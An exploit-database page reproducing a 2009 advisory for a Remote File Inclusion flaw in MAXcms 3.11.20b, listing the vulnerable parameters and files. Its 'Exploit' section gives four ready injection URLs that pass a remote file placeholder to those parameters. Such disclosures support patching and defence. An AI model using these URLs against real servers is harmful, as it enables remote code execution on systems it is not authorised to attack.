header-logo
Suggest Exploit
vendor:
MAXcms - Databay Content Management System
by:
NoGe
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: MAXcms - Databay Content Management System
Affected Version From: 3.11.20b
Affected Version To: 3.11.20b
Patch Exists: Yes
Related CWE: N/A
CPE: a:databay:maxcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MAXcms – Databay Content Management System 3.11.20b Remote File Inclusion Vulnerability

MAXcms - Databay Content Management System version 3.11.20b is vulnerable to Remote File Inclusion. The vulnerable parameters are is_projectPath, GLOBALS[thCMS_root], is_path and thCMS_root. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameters. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of MAXcms - Databay Content Management System.
Source

Exploit-DB raw data:

===============================================================================================


  [o] MAXcms - Databay Content Management System 3.11.20b Remote File Inclusion Vulnerability

       Software : MAXcms - Databay Content Management System version 3.11.20b
       Vendor   : http://www.databay.de
       Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===============================================================================================


  [o] Vulnerable file


       is_projectPath parameter

        includes/InstantSite/inc.is_root.php

       GLOBALS[thCMS_root] parameter

        classes/class.Tree.php
        includes/inc.thcms_admin_mediamanager.php
        modul/mod.rssreader.php

       is_path parameter

        classes/class.tasklist.php
        classes/class.thcms.php
        classes/class.thcms_content.php
        classes/class.thcms_modul_parent.php
        classes/class.thcms_page.php
        classes/class.thcsm_user.php
        includes/InstantSite/class.Tree.php

       thCMS_root parameter

        classes/class.thcms_modul.php
        includes/inc.page_edit_tasklist.php
        includes/inc.thcms_admin_overview_backup.php
        includes/inc.thcms_edit_content.php
        modul/class.thcms_modul_parent_xml.php
        modul/mod.cmstranslator.php
        modul/mod.download.php
        modul/mod.faq.php
        modul/mod.guestbook.php
        modul/mod.html.php
        modul/mod.menu.php
        modul/mod.news.php
        modul/mod.newsticker.php
        modul/mod.rss.php
        modul/mod.search.php
        modul/mod.sendtofriend.php
        modul/mod.sitemap.php
        modul/mod.tagdoc.php
        modul/mod.template.php
        modul/mod.test.php
        modul/mod.text.php
        modul/mod.upload.php
        modul/mod.users.php



  [o] Exploit

       http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
       http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
       http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]
       http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]


===============================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
===============================================================================================

# milw0rm.com [2009-08-01]